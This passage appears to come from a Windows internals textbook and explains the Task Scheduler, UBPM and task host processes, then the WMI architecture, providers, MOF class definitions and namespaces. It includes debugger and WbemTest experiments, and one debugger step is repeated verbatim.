Open the Registry Editor and navigate to the HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID
key. Select Find... from the Edit menu and copy and paste the CLSID located after the ClassID XML
tag of the task descriptor (with or without the curly brackets). You should be able to find the DLL
that implements the ITaskHandler interface representing the task, which will be hosted by the Task
Host client application (Taskhostw.exe, described later in the “Task host client” section):
If you navigate in the HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\
TaskCache\Tasks registry key, you should also be able to find the GUID of the task descriptor
stored in the Task store cache. To find it, you should search using the task’s URI. Indeed, the
task’s GUID is not stored in the XML configuration file. The data belonging to the task descrip-
tor in the registry is identical to the one stored in the XML configuration file located in the
store's shadow copy (%systemroot%\System32\Tasks\Microsoft\Windows\MemoryDiagnostic\
ProcessMemoryDiagnosticEvents). Only the binary format in which it is stored changes.
Enabled tasks should be registered with UBPM. The Task Scheduler calls the RegisterTask function
of the Ubpm Proxy, which first connects to the Credential store, for retrieving the credential used to
start the task, and then processes the list of all actions and triggers (stored in an internal list), convert-
ing them into a format that UBPM can understand. Finally, it calls the UbpmTriggerConsumerRegister API
exported from UBPM.dll. The task is ready to be executed when the right conditions are verified.
Unified Background Process Manager (UBPM)
Traditionally, UBPM was mainly responsible for managing tasks' life cycles and states (start, stop, enable/
disable, and so on) and for providing notification and trigger support. Windows 8.1 introduced the Broker
Infrastructure and moved all the triggers and notifications management to different brokers that can
be used by both Modern and standard Win32 applications. Thus, in Windows 10, UBPM acts as a proxy
for standard Win32 Tasks’ triggers and translates the trigger consumers request to the correct broker.
UBPM is still responsible for providing COM APIs available to applications for the following:

- Registering and unregistering a trigger consumer, as well as opening and closing a handle to one

- Generating a notification or a trigger

- Sending a command to a trigger provider
Similar to the Task Scheduler’s architecture, UBPM is composed of various internal components: Task
Host server and client, COM-based Task Host library, and Event Manager.
Task host server
When one of the System brokers raises an event registered by a UBPM trigger consumer (by publishing
a WNF state change), the UbpmTriggerArrived callback function is executed. UBPM searches the inter-
nal list of a registered task’s triggers (based on the WNF state name) and, when it finds the correct one,
processes the task’s actions. At the time of this writing, only the Launch Executable action is supported.
This action supports both hosted and nonhosted executables. Nonhosted executables are regular
Win32 executables that do not directly interact with UBPM; hosted executables are COM classes that
directly interact with UBPM and need to be hosted by a task host client process. After a host-based
executable (taskhostw.exe) is launched, it can host different tasks, depending on its associated token.
(Host-based executables are very similar to shared Svchost services.)
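The dispatch path can be modeled as follows. This is an illustrative Python sketch: the dictionary-based trigger records and the action-type string are invented for the example and do not reflect UBPM's real internal data structures.

```python
def ubpm_trigger_arrived(registered_triggers, wnf_state_name):
    """Model of the UbpmTriggerArrived flow: find the triggers registered
    for the published WNF state name and process their actions. Only the
    Launch Executable action type is handled, mirroring the text above."""
    launched = []
    for trigger in registered_triggers:
        if trigger["wnf_state"] != wnf_state_name:
            continue
        for action in trigger["actions"]:
            if action["type"] == "LaunchExecutable":
                launched.append(action["image_path"])
    return launched
```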
Like SCM, UBPM supports different types of logon security tokens for tasks' host processes. The
UbpmTokenGetTokenForTask function is able to create a new token based on the account information
stored in the task descriptor. The security token generated by UBPM for a task can have one of the fol-
lowing owners: a registered user account, Virtual Service account, Network Service account, or Local
Service account. Unlike SCM, UBPM fully supports Interactive tokens. UBPM uses services exposed by
the User Manager (Usermgr.dll) to enumerate the currently active interactive sessions. For each session,
it compares the User SID specified in the task’s descriptor with the owner of the interactive session. If
the two match, UBPM duplicates the token attached to the interactive session and uses it to log on the
new executable. As a result, interactive tasks can run only with a standard user account. (Noninteractive
tasks can run with all the account types listed previously.)
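The SID-matching step can be sketched in Python. Again a hedged model: `find_interactive_token`, the session dictionaries, and the returned token value are illustrative; the real code enumerates sessions through the User Manager and duplicates the session token rather than returning it directly.

```python
def find_interactive_token(task_user_sid, active_sessions):
    """Sketch of UBPM's interactive-token selection: scan the active
    interactive sessions and pick the token of the session whose owner
    SID matches the User SID in the task descriptor."""
    for session in active_sessions:
        if session["owner_sid"] == task_user_sid:
            return session["token"]
    return None  # no matching session: the interactive task cannot start
```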
After the token has been generated, UBPM starts the task’s host process. In case the task is a hosted
COM task, the UbpmFindHost function searches inside an internal list of Taskhostw.exe (task host cli-
ent) process instances. If it finds a process that runs with the same security context of the new task, it
simply sends a Start Task command (which includes the COM task’s name and CLSID) through the task
host local RPC connection and waits for the first response. The task host client process and UBPM are
connected through a static RPC channel (named ubpmtaskhostchannel) and use a connection protocol
similar to the one implemented in the SCM.
If a compatible client process instance has not been found, or if the task’s host process is a regular
non-COM executable, UBPM builds a new environment block, parses the command line, and creates a
new process in a suspended state using the CreateProcessAsUser API. UBPM runs each task’s host pro-
cess in a Job object, which allows it to quickly set the state of multiple tasks and fine-tune the resources
allocated for background tasks. UBPM searches inside an internal list for Job objects containing host
processes belonging to the same session ID and the same type of tasks (regular, critical, COM-based,
or non-hosted). If it finds a compatible Job, it simply assigns the new process to the Job (by using the
AssignProcessToJobObject API). Otherwise, it creates a new one and adds it to its internal list.
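The Job-reuse decision can be modeled as follows. This Python sketch is an assumption-laden illustration: `assign_host_to_job` and the dictionary fields are invented names; the real code manipulates kernel Job objects via AssignProcessToJobObject rather than Python lists.

```python
def assign_host_to_job(jobs, session_id, task_type, process_id):
    """Model of UBPM's Job object reuse: look for an existing Job grouping
    host processes with the same session ID and task type; create a new
    Job only when no compatible one exists."""
    for job in jobs:
        if job["session_id"] == session_id and job["task_type"] == task_type:
            job["processes"].append(process_id)   # reuse the compatible Job
            return job
    new_job = {"session_id": session_id, "task_type": task_type,
               "processes": [process_id]}
    jobs.append(new_job)                          # no match: create one
    return new_job
```

Grouping host processes this way lets UBPM suspend, resume, or throttle a whole class of tasks with a single operation on the containing Job.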
After the Job object has been created, the task is finally ready to be started: the initial process’s
thread is resumed. For COM-hosted tasks, UBPM waits for the initial contact from the task host client
(performed when the client wants to open a RPC communication channel with UBPM, similar to the
way in which Service control applications open a channel to the SCM) and sends the Start Task com-
mand. UBPM finally registers a wait callback on the task's host process, which allows it to detect when
a task host process terminates unexpectedly.
Task Host client
The Task Host client process receives commands from UBPM (Task Host Server) living in the Task
Scheduler service. At initialization time, it opens the local RPC interface that was created by UBPM during
its initialization and loops forever, waiting for commands to come through the channel. Four commands
are currently supported, which are sent over the TaskHostSendResponseReceiveCommand RPC API:

- Stopping the host

- Starting a task

- Stopping a task

- Terminating a task
All task-based commands are internally implemented by a generic COM task library, and they
essentially result in the creation and destruction of COM components. In particular, hosted tasks
are COM objects that inherit from the ITaskHandler interface. The latter exposes only four required
methods, which correspond to the different task’s state transitions: Start, Stop, Pause, and Resume.
When UBPM sends the command to start a task to its client host process, the latter (Taskhostw.exe)
creates a new thread for the task. The new task worker thread uses the CoCreateInstance func-
tion to create an instance of the ITaskHandler COM object representing the task and calls its Start
method. UBPM knows exactly which CLSID (class unique ID) identifies a particular task: The task’s
CLSID is stored by the Task store in the task’s configuration and is specified at task registration time.
Additionally, hosted tasks use the functions exposed by the ITaskHandlerStatus COM interface to
notify UBPM of their current execution state. The interface uses RPCs to call UbpmReportTaskStatus
and report the new state back to UBPM.
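The state machine implied by the four ITaskHandler methods can be mirrored in a toy Python class. This is only a model of the transitions: the real task is a COM object created via CoCreateInstance, and the method names below merely echo the interface's Start, Stop, Pause, and Resume methods.

```python
class HostedTaskModel:
    """Toy model of a COM-hosted task driven through the four
    ITaskHandler state transitions."""
    def __init__(self):
        self.state = "idle"

    def start(self, data=None):
        self.state = "running"        # the task body would execute here

    def pause(self):
        if self.state == "running":
            self.state = "paused"

    def resume(self):
        if self.state == "paused":
            self.state = "running"

    def stop(self):
        self.state = "stopped"
        return 0                      # S_OK-style success code
```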
EXPERIMENT: Witnessing a COM-hosted task
In this experiment, you witness how the task host client process loads the COM server DLL that
implements the task. For this experiment, you need the Debugging tools installed on your
system. (You can find the Debugging tools as part of the Windows SDK, which is available at the
https://developer.microsoft.com/en-us/windows/downloads/windows-10-sdk/.) You will enable the
task start’s debugger breakpoint by following these steps:
1. You need to set up Windbg as the default post-mortem debugger. (You can skip this
step if you have connected a kernel debugger to the target system.) To do that, open an
administrative command prompt and type the following commands:

cd "C:\Program Files (x86)\Windows Kits\10\Debuggers\x64"
windbg.exe /I

Note that C:\Program Files (x86)\Windows Kits\10\Debuggers\x64 is the path of the
Debugging tools, which can change depending on the debugger's version and the
setup program.

2. Windbg should run and show the following message, confirming the success of
the operation:

3. After you click the OK button, WinDbg should close automatically.

4. Open the Task Scheduler applet (by typing taskschd.msc in the command prompt).

5. Note that unless you have a kernel debugger attached, you can't enable the initial task's
breakpoint on noninteractive tasks; otherwise, you won't be able to interact with the
debugger window, which will be spawned in another noninteractive session.

6. Looking at the various tasks (refer to the previous experiment, "Explore a task's XML
descriptor," for further details), you should find an interactive COM task (named
CacheTask) under the \Microsoft\Windows\Wininet path. Remember that the task's
Actions page should show Custom Handler; otherwise, the task is not a COM task.

7. Open the Registry Editor (by typing regedit in the command prompt window) and
navigate to the following registry key: HKLM\SOFTWARE\Microsoft\Windows NT\
CurrentVersion\Schedule.

8. Right-click the Schedule key and create a new registry value by selecting Multi-String
Value from the New menu.
9. Name the new registry value EnableDebuggerBreakForTaskStart. To enable the initial
task breakpoint, you should insert the full path of the task. In this case, the full path is
\Microsoft\Windows\Wininet\CacheTask. In the previous experiment, the task path was
referred to as the task's URI.

10. Close the Registry Editor and switch back to the Task Scheduler.

11. Right-click the CacheTask task and select Run.

12. If you have configured everything correctly, a new WinDbg window should appear.

13. Configure the symbols used by the debugger by selecting the Symbol File Path item
from the File menu and by inserting a valid path to the Windows symbol server (see
https://docs.microsoft.com/en-us/windows-hardware/drivers/debugger/microsoft-public-symbols
for more details).

14. You should be able to peek at the call stack of the Taskhostw.exe process just before
it was interrupted using the k command:

0:000> k
 # Child-SP          RetAddr           Call Site
00 000000a7`01a7f610 00007ff6`0b0337a8 taskhostw!ComTaskMgrBase::[ComTaskMgr]::StartComTask+0x2c4
01 000000a7`01a7f960 00007ff6`0b033621 taskhostw!StartComTask+0x58
02 000000a7`01a7f9d0 00007ff6`0b033191 taskhostw!UbpmTaskHostWaitForCommands+0x2d1
03 000000a7`01a7fb00 00007ff6`0b035659 taskhostw!wWinMain+0xc1
04 000000a7`01a7fb60 00007ffa`39487bd4 taskhostw!__wmainCRTStartup+0x1c9
05 000000a7`01a7fc20 00007ffa`39aeced1 KERNEL32!BaseThreadInitThunk+0x14
06 000000a7`01a7fc50 00000000`00000000 ntdll!RtlUserThreadStart+0x21

15. The stack shows that the task host client has just been spawned by UBPM and has
received the Start command requesting to start a task.

16. In the Windbg console, insert the ~. command and press Enter. Note the current
executing thread ID.

17. You should now put a breakpoint on the CoCreateInstance COM API and resume the
execution, using the following commands:

bp combase!CoCreateInstance
g

18. After the debugger breaks, again insert the ~. command in the Windbg console, press
Enter, and note that the thread ID has completely changed.

19. This demonstrates that the task host client has created a new thread for executing the
task entry point. The documented CoCreateInstance function is used for creating a single
COM object of the class associated with a particular CLSID, specified as a parameter. Two
GUIDs are interesting for this experiment: the GUID of the COM class that represents the
task and the interface ID of the interface implemented by the COM object.
20. In 64-bit systems, the calling convention defines that the first four function parameters
are passed through registers, so it is easy to extract those GUIDs:

0:004> dt combase!CLSID @rcx
{0358b920-0ac7-461f-98f4-58e32cd89148}
   +0x000 Data1 : 0x358b920
   +0x004 Data2 : 0xac7
   +0x006 Data3 : 0x461f
   +0x008 Data4 : [8]  "???"

0:004> dt combase!IID @r9
{839d7762-5121-4009-9234-4f0d19394f04}
   +0x000 Data1 : 0x839d7762
   +0x004 Data2 : 0x5121
   +0x006 Data3 : 0x4009
   +0x008 Data4 : [8]  "???"

As you can see from the preceding output, the COM server CLSID is {0358b920-0ac7-461f-
98f4-58e32cd89148}. You can verify that it corresponds to the GUID of the only COM action
located in the XML descriptor of the CacheTask task (see the previous experiment for details).
The requested interface ID is {839d7762-5121-4009-9234-4f0d19394f04}, which corresponds
to the GUID of the COM task handler action interface (ITaskHandler).
Task Scheduler COM interfaces
As we have discussed in the previous section, a COM task should adhere to a well-defined interface,
which is used by UBPM to manage the state transition of the task. While UBPM decides when to start
the task and manages all of its state, all the other interfaces used to register, remove, or just manually
start and stop a task are implemented by the Task Scheduler in its client-side DLL (Taskschd.dll).
ITaskService is the central interface by which clients can connect to the Task Scheduler and perform
multiple operations, like enumerate registered tasks; get an instance of the Task store (represented by
the ITaskFolder COM interface); and enable, disable, delete, or register a task and all of its associated
triggers and actions (by using the ITaskDefinition COM interface). When a client application invokes
a Task Scheduler API through COM for the first time, the system loads the Task Scheduler client-side DLL
(Taskschd.dll) into the client process’s address space (as dictated by the COM contract: Task Scheduler
COM objects live in an in-proc COM server). The COM APIs are implemented by routing requests
through RPC calls into the Task Scheduler service, which processes each request and forwards it to
UBPM if needed. The Task Scheduler COM architecture allows users to interact with it via scripting
languages like PowerShell (through the ScheduledTasks cmdlet) or VBScript.
Windows Management Instrumentation
Windows Management Instrumentation (WMI) is an implementation of Web-Based Enterprise
Management (WBEM), a standard that the Distributed Management Task Force (DMTF—an indus-
try consortium) defines. The WBEM standard encompasses the design of an extensible enterprise
20. In 64-bit systems, the calling convention defines that the first four function parameters
are passed through registers, so it is easy to extract those GUIDs:
0:004> dt combase!CLSID @rcx
 {0358b920-0ac7-461f-98f4-58e32cd89148}
   +0x000 Data1 : 0x358b920
   +0x004 Data2 : 0xac7
   +0x006 Data3 : 0x461f
   +0x008 Data4 : [8] "???"
0:004> dt combase!IID @r9
 {839d7762-5121-4009-9234-4f0d19394f04}
   +0x000 Data1 : 0x839d7762
   +0x004 Data2 : 0x5121
   +0x006 Data3 : 0x4009
   +0x008 Data4 : [8] "???"
As you can see from the preceding output, the COM server CLSID is {0358b920-0ac7-461f-
98f4-58e32cd89148}. You can verify that it corresponds to the GUID of the only COM action
located in the XML descriptor of the “CacheTask” task (see the previous experiment for details).
The requested interface ID is {839d7762-5121-4009-9234-4f0d19394f04}, which corresponds to
the GUID of the COM task handler action interface (ITaskHandler).
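The Data1/Data2/Data3/Data4 layout that the debugger shows is the standard GUID structure, which is language-independent. As a portable sketch (Python here, rather than the debugger), the CLSID recovered above can be split into the same fields:

```python
import uuid

# The COM action CLSID recovered from @rcx in the debugger output above.
clsid = uuid.UUID("0358b920-0ac7-461f-98f4-58e32cd89148")

# uuid.UUID.fields exposes Data1, Data2, and Data3 directly; Data4 is the
# final 8 bytes of the GUID.
data1, data2, data3 = clsid.fields[0], clsid.fields[1], clsid.fields[2]
data4 = clsid.bytes[8:]

print(hex(data1))   # 0x358b920, matching the debugger's +0x000 Data1
print(hex(data2))   # 0xac7,     matching +0x004 Data2
print(hex(data3))   # 0x461f,    matching +0x006 Data3
print(data4.hex())  # 98f458e32cd89148, the 8 bytes the debugger shows as Data4
```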
CHAPTER 10 Management, diagnostics, and tracing
487
data-collection and data-management facility that has the flexibility and extensibility required to man-
age local and remote systems that comprise arbitrary components.
WMI architecture
WMI consists of four main components, as shown in Figure 10-27: management applications, WMI
infrastructure, providers, and managed objects. Management applications are Windows applications
that access and display or process data about managed objects. A simple example of a management
application is a performance tool replacement that relies on WMI rather than the Performance API to
obtain performance information. A more complex example is an enterprise-management tool that lets
administrators perform automated inventories of the software and hardware configuration of every
computer in their enterprise.
[Figure: management applications (database applications via ODBC, VBScript/Perl scripts, ActiveX controls, .NET applications, C/C++ applications, and Windows PowerShell) call the Windows Management API and reach the WMI infrastructure — the CIM Object Manager (CIMOM) and the CIM repository — over COM/DCOM; the CIMOM in turn communicates over COM/DCOM with providers (SNMP, Windows, and Registry providers) that expose their managed objects.]
FIGURE 10-27 WMI architecture.
Developers typically must target management applications to collect data from and manage
specific objects. An object might represent one component, such as a network adapter device, or a col-
lection of components, such as a computer. (The computer object might contain the network adapter
object.) Providers need to define and export the representation of the objects that management ap-
plications are interested in. For example, the vendor of a network adapter might want to add adapter-
specific properties to the network adapter WMI support that Windows includes, querying and setting
the adapter’s state and behavior as the management applications direct. In some cases (for example,
for device drivers), Microsoft supplies a provider that has its own API to help developers leverage the
provider’s implementation for their own managed objects with minimal coding effort.
The WMI infrastructure, the heart of which is the Common Information Model (CIM) Object
Manager (CIMOM), is the glue that binds management applications and providers. (CIM is described
later in this chapter.) The infrastructure also serves as the object-class store and, in many cases, as
the storage manager for persistent object properties. WMI implements the store, or repository, as an
on-disk database named the CIMOM Object Repository. As part of its infrastructure, WMI supports
several APIs through which management applications access object data and providers supply data
and class definitions.
Windows programs and scripts (such as Windows PowerShell) use the WMI COM API, the primary
management API, to directly interact with WMI. Other APIs layer on top of the COM API and include an
Open Database Connectivity (ODBC) adapter for the Microsoft Access database application. A data-
base developer uses the WMI ODBC adapter to embed references to object data in the developer’s da-
tabase. Then the developer can easily generate reports with database queries that contain WMI-based
data. WMI ActiveX controls support another layered API. Web developers use the ActiveX controls to
construct web-based interfaces to WMI data. Another management API is the WMI scripting API, for
use in script-based applications (like Visual Basic Scripting Edition). WMI scripting support exists for all
Microsoft programming language technologies.
Because WMI COM interfaces are for management applications, they constitute the primary API
for providers. However, unlike management applications, which are COM clients, providers are COM
or Distributed COM (DCOM) servers (that is, the providers implement COM objects that WMI interacts
with). Possible embodiments of a WMI provider include DLLs that load into WMI's manager process
or stand-alone Windows applications or Windows services. Microsoft includes a number of built-in
providers that present data from well-known sources, such as the Performance API, the registry, the
Event Manager, Active Directory, SNMP, and modern device drivers. The WMI SDK lets developers
develop third-party WMI providers.
WMI providers
At the core of WBEM is the DMTF-designed CIM specification. The CIM specifies how management
systems represent, from a systems management perspective, anything from a computer to an applica-
tion or device on a computer. Provider developers use the CIM to represent the components that make
up the parts of an application for which the developers want to enable management. Developers use
the Managed Object Format (MOF) language to implement a CIM representation.
In addition to defining classes that represent objects, a provider must interface WMI to the objects.
WMI classifies providers according to the interface features the providers supply. Table 10-14 lists WMI
provider classifications. Note that a provider can implement one or more features; therefore, a provider
can be, for example, both a class and an event provider. To clarify the feature definitions in Table 10-14,
let’s look at a provider that implements several of those features. The Event Log provider supports
several objects, including an Event Log Computer, an Event Log Record, and an Event Log File. The
Event Log is an Instance provider because it can define multiple instances for several of its classes. One
class for which the Event Log provider defines multiple instances is the Event Log File class (Win32_
NTEventlogFile); the Event Log provider defines an instance of this class for each of the system’s event
logs (that is, System Event Log, Application Event Log, and Security Event Log).
TABLE 10-14 Provider classifications
Classification    Description
Class             Can supply, modify, delete, and enumerate a provider-specific class. It can also support
                  query processing. Active Directory is a rare example of a service that is a class provider.
Instance          Can supply, modify, delete, and enumerate instances of system and provider-specific
                  classes. An instance represents a managed object. It can also support query processing.
Property          Can supply and modify individual object property values.
Method            Supplies methods for a provider-specific class.
Event             Generates event notifications.
Event consumer    Maps a physical consumer to a logical consumer to support event notification.
The Event Log provider defines the instance data and lets management applications enumerate the
records. To let management applications use WMI to back up and restore the Event Log files, the Event
Log provider implements backup and restore methods for Event Log File objects. Doing so makes the
Event Log provider a Method provider. Finally, a management application can register to receive noti-
fication whenever a new record writes to one of the Event Logs. Thus, the Event Log provider serves as
an Event provider when it uses WMI event notification to tell WMI that Event Log records have arrived.
The Common Information Model and the Managed Object
Format Language
The CIM follows in the steps of object-oriented languages such as C++ and C#, in which a modeler
designs representations as classes. Working with classes lets developers use the powerful modeling
techniques of inheritance and composition. Subclasses can inherit the attributes of a parent class, and
they can add their own characteristics and override the characteristics they inherit from the parent
class. A class that inherits properties from another class derives from that class. Classes also compose: a
developer can build a class that includes other classes. CIM classes consist of properties and methods.
Properties describe the configuration and state of a WMI-managed resource, and methods are execut-
able functions that perform actions on the WMI-managed resource.
The DMTF provides multiple classes as part of the WBEM standard. These classes are CIM’s basic
language and represent objects that apply to all areas of management. The classes are part of the
CIM core model. An example of a core class is CIM_ManagedSystemElement. This class contains a
few basic properties that identify physical components such as hardware devices and logical compo-
nents such as processes and files. The properties include a caption, description, installation date, and
status. Thus, the CIM_LogicalElement and CIM_PhysicalElement classes inherit the attributes of the
CIM_ManagedSystemElement class. These two classes are also part of the CIM core model. The WBEM
standard calls these classes abstract classes because they exist solely as classes that other classes inherit
(that is, no object instances of an abstract class exist). You can therefore think of abstract classes as tem-
plates that define properties for use in other classes.
A second category of classes represents objects that are specific to management areas but indepen-
dent of a particular implementation. These classes constitute the common model and are considered
an extension of the core model. An example of a common-model class is the CIM_FileSystem class,
which inherits the attributes of CIM_LogicalElement. Because virtually every operating system—including
Windows, Linux, and other varieties of UNIX—relies on file system–based structured storage, the
CIM_FileSystem class is an appropriate constituent of the common model.
The final class category, the extended model, comprises technology-specific additions to the
common model. Windows defines a large set of these classes to represent objects specific to the
Windows environment. Because all operating systems store data in files, the CIM model includes the
CIM_LogicalFile class. The CIM_DataFile class inherits the CIM_LogicalFile class, and Windows adds the
Win32_PageFile and Win32_ShortcutFile file classes for those Windows file types.
Windows includes different WMI management applications that allow an administrator to inter-
act with WMI namespaces and classes. The WMI command-line utility (WMIC.exe) and Windows
PowerShell are able to connect to WMI, execute queries, and invoke WMI class object methods.
Figure 10-28 shows a PowerShell window extracting information of the Win32_NTEventlogFile class,
part of the Event Log provider. This class makes extensive use of inheritance and derives from CIM_
DataFile. Event Log files are data files that have additional Event Log–specific attributes such as a log
file name (LogfileName) and a count of the number of records that the file contains (NumberOfRecords).
The Win32_NTEventlogFile is based on several levels of inheritance, in which CIM_DataFile derives
from CIM_LogicalFile, which derives from CIM_LogicalElement, and CIM_LogicalElement derives from
CIM_ManagedSystemElement.
FIGURE 10-28 Windows PowerShell extracting information from the Win32_NTEventlogFile class.
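The inheritance chain just described can be sketched portably. The following Python fragment (Python is used here only as a neutral modeling language; the class names come from the CIM/Win32 schema, while the property sets attached to each level are illustrative, not the complete schema) shows how Win32_NTEventlogFile accumulates properties through several levels of inheritance:

```python
# Illustrative sketch of the Win32_NTEventlogFile inheritance chain.
# Property sets are partial examples, not the full CIM schema.
class CIM_ManagedSystemElement:
    properties = {"Caption", "Description", "InstallDate", "Status"}

class CIM_LogicalElement(CIM_ManagedSystemElement):
    properties = CIM_ManagedSystemElement.properties

class CIM_LogicalFile(CIM_LogicalElement):
    properties = CIM_LogicalElement.properties | {"Name", "FileSize"}

class CIM_DataFile(CIM_LogicalFile):
    properties = CIM_LogicalFile.properties | {"Manufacturer", "Version"}

class Win32_NTEventlogFile(CIM_DataFile):
    # Event Log-specific additions layered on top of everything inherited.
    properties = CIM_DataFile.properties | {"LogfileName", "NumberOfRecords"}

# An instance therefore carries core-model properties such as InstallDate
# alongside its own Event Log-specific LogfileName.
assert "InstallDate" in Win32_NTEventlogFile.properties
assert "LogfileName" in Win32_NTEventlogFile.properties
```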
As stated earlier, WMI provider developers write their classes in the MOF language. The following
output shows the definition of the Event Log provider’s Win32_NTEventlogFile, which has been queried
in Figure 10-28:
[dynamic: ToInstance, provider("MS_NT_EVENTLOG_PROVIDER"): ToInstance, SupportsUpdate,
Locale(1033): ToInstance, UUID("{8502C57B-5FBB-11D2-AAC1-006008C78BC7}"): ToInstance]
class Win32_NTEventlogFile : CIM_DataFile
{
[Fixed: ToSubClass, read: ToSubClass] string LogfileName;
[read: ToSubClass, write: ToSubClass] uint32 MaxFileSize;
[read: ToSubClass] uint32 NumberOfRecords;
[read: ToSubClass, volatile: ToSubClass, ValueMap{"0", "1..365", "4294967295"}:
ToSubClass] string OverWritePolicy;
[read: ToSubClass, write: ToSubClass, Range("0-365 | 4294967295"): ToSubClass]
uint32 OverwriteOutDated;
[read: ToSubClass] string Sources[];
[ValueMap{"0", "8", "21", ".."}: ToSubClass, implemented, Privileges{
"SeSecurityPrivilege", "SeBackupPrivilege"}: ToSubClass]
uint32 ClearEventlog([in] string ArchiveFileName);
[ValueMap{"0", "8", "21", "183", ".."}: ToSubClass, implemented, Privileges{
"SeSecurityPrivilege", "SeBackupPrivilege"}: ToSubClass]
uint32 BackupEventlog([in] string ArchiveFileName);
};
One term worth reviewing is dynamic, which is a descriptive designator for the Win32_NTEventlogFile
class that the MOF file in the preceding output shows. Dynamic means that the WMI infrastructure
asks the WMI provider for the values of properties associated with an object of that class whenever a
management application queries the object’s properties. A static class is one in the WMI repository; the
WMI infrastructure refers to the repository to obtain the values instead of asking a provider for the val-
ues. Because updating the repository is a relatively expensive operation, dynamic providers are more
efficient for objects that have properties that change frequently.
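The dynamic-versus-static distinction can be illustrated with a small portable sketch (Python here; all names are hypothetical, not WMI APIs): a static class answers queries from the repository cache, while a dynamic class calls back into its provider on every access, so frequently changing values stay fresh without expensive repository updates.

```python
# Hypothetical sketch of dynamic vs. static WMI classes.
class Repository:
    def __init__(self):
        # Updated only by (relatively expensive) repository writes.
        self.cache = {"MaxFileSize": 20971520}

class EventLogProvider:
    def __init__(self):
        self.records = 0
    def get(self, prop):
        if prop == "NumberOfRecords":
            return self.records          # always the live value

repo = Repository()
provider = EventLogProvider()

def query(prop, dynamic):
    # Dynamic: ask the provider each time. Static: read the repository cache.
    return provider.get(prop) if dynamic else repo.cache[prop]

provider.records = 41
print(query("NumberOfRecords", dynamic=True))   # 41, fetched from the provider
provider.records = 42
print(query("NumberOfRecords", dynamic=True))   # 42, no repository write needed
print(query("MaxFileSize", dynamic=False))      # 20971520, served from the cache
```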
EXPERIMENT: Viewing the MOF definitions of WMI classes
You can view the MOF definition for any WMI class by using the Windows Management
Instrumentation Tester tool (WbemTest) that comes with Windows. In this experiment, we
look at the MOF definition for the Win32_NTEventLogFile class:
1. Type Wbemtest in the Cortana search box and press Enter. The Windows Management
   Instrumentation Tester should open.
2. Click the Connect button, change the Namespace to root\cimv2, and connect. The tool
   should enable all the command buttons, as shown in the following figure:
3. Click the Enum Classes button, select the Recursive option button, and then click OK.
4. Find Win32_NTEventLogFile in the list of classes, and then double-click it to see its class
   properties.
5. Click the Show MOF button to open a window that displays the MOF text.
After constructing classes in MOF, WMI developers can supply the class definitions to WMI in several
ways. WDM driver developers compile a MOF file into a binary MOF (BMF) file—a more compact
binary representation than an MOF file—and can choose to dynamically give the BMF files to the WDM
infrastructure or to statically include it in their binary. Another way is for the provider to compile the
MOF and use WMI COM APIs to give the definitions to the WMI infrastructure. Finally, a provider can
use the MOF Compiler (Mofcomp.exe) tool to give the WMI infrastructure a classes-compiled represen-
tation directly.
Note Previous editions of Windows (until Windows 7) provided a graphical tool, called
WMI CIM Studio, shipped with the WMI Administrative Tool. The tool was able to graphi-
cally show WMI namespaces, classes, properties, and methods. Nowadays, the tool is not
supported or available for download because it was superseded by the WMI capabilities of
Windows PowerShell. PowerShell is a scripting language that does not run with a GUI. Some
third-party tools present an interface similar to CIM Studio's. One of them is WMI Explorer,
which is downloadable from https://github.com/vinaypamnani/wmie2/releases.
The Common Information Model (CIM) repository is stored in the %SystemRoot%\System32\wbem\
Repository path and includes the following:
■ Index.btr       Binary-tree (btree) index file
■ MappingX.map    Transaction control files (X is a number starting from 1)
■ Objects.data    CIM repository where managed resource definitions are stored
The WMI namespace
Classes define objects, which are provided by a WMI provider. Objects are class instances on a sys-
tem. WMI uses a namespace that contains several subnamespaces that WMI arranges hierarchically to
organize objects. A management application must connect to a namespace before the application can
access objects within the namespace.
WMI names the namespace root directory ROOT. All WMI installations have four predefined
namespaces that reside beneath root: CIMV2, Default, Security, and WMI. Some of these namespaces
have other namespaces within them. For example, CIMV2 includes the Applications and ms_409
namespaces as subnamespaces. Providers sometimes define their own namespaces; you can see the
WMI namespace (which the Windows device driver WMI provider defines) beneath ROOT in Windows.
Unlike a file system namespace, which comprises a hierarchy of directories and files, a WMI
namespace is only one level deep. Instead of using names as a file system does, WMI uses object
properties that it defines as keys to identify the objects. Management applications specify class names
with key names to locate specific objects within a namespace. Thus, each instance of a class must be
uniquely identifiable by its key values. For example, the Event Log provider uses the Win32_NTLogEvent
class to represent records in an Event Log. This class has two keys: Logfile, a string; and RecordNumber,
an unsigned integer. A management application that queries WMI for instances of Event Log records
obtains them from the provider, using key pairs that identify the records. The application refers to a record using
the syntax that you see in this sample object path name:
\\ANDREA-LAPTOP\root\CIMV2:Win32_NTLogEvent.Logfile="Application",
RecordNumber="1"
The first component in the name (\\ANDREA-LAPTOP) identifies the computer on which the object
is located, and the second component (\root\CIMV2) is the namespace in which the object resides. The
class name follows the colon, and key names and their associated values follow the period. A comma
separates the key values.
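The object-path syntax just described can be taken apart mechanically. The following Python sketch (used here only as a portable illustration; the path string is the sample above) splits a WMI object path into its computer, namespace, class, and key components:

```python
import re

# Split a WMI object path of the form
#   \\computer\namespace:Class.Key1="v1",Key2="v2"
# into its components, following the syntax described above.
path = r'\\ANDREA-LAPTOP\root\CIMV2:Win32_NTLogEvent.Logfile="Application",RecordNumber="1"'

m = re.match(r'\\\\([^\\]+)(\\[^:]+):(\w+)\.(.*)', path)
computer, namespace, class_name, key_part = m.groups()
keys = dict(re.findall(r'(\w+)="([^"]*)"', key_part))

print(computer)    # ANDREA-LAPTOP
print(namespace)   # \root\CIMV2
print(class_name)  # Win32_NTLogEvent
print(keys)        # {'Logfile': 'Application', 'RecordNumber': '1'}
```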
WMI provides interfaces that let applications enumerate all the objects in a particular class or make
queries that return instances of a class that match a query criterion.
Class association
Many object types are related to one another in some way. For example, a computer object has a
processor, software, an operating system, active processes, and so on. WMI lets providers construct an
association class to represent a logical connection between two different classes. Association classes
associate one class with another, so the classes have only two properties: a class name and the Ref
modifier. The following output shows an association in which the Event Log provider’s MOF file associ-
ates the Win32_NTLogEvent class with the Win32_ComputerSystem class. Given an object, a manage-
ment application can query associated objects. In this way, a provider defines a hierarchy of objects.
[dynamic: ToInstance, provider("MS_NT_EVENTLOG_PROVIDER"): ToInstance, EnumPrivileges{"SeSe
curityPrivilege"}: ToSubClass, Privileges{"SeSecurityPrivilege"}: ToSubClass, Locale(1033):
ToInstance, UUID("{8502C57F-5FBB-11D2-AAC1-006008C78BC7}"): ToInstance, Association:
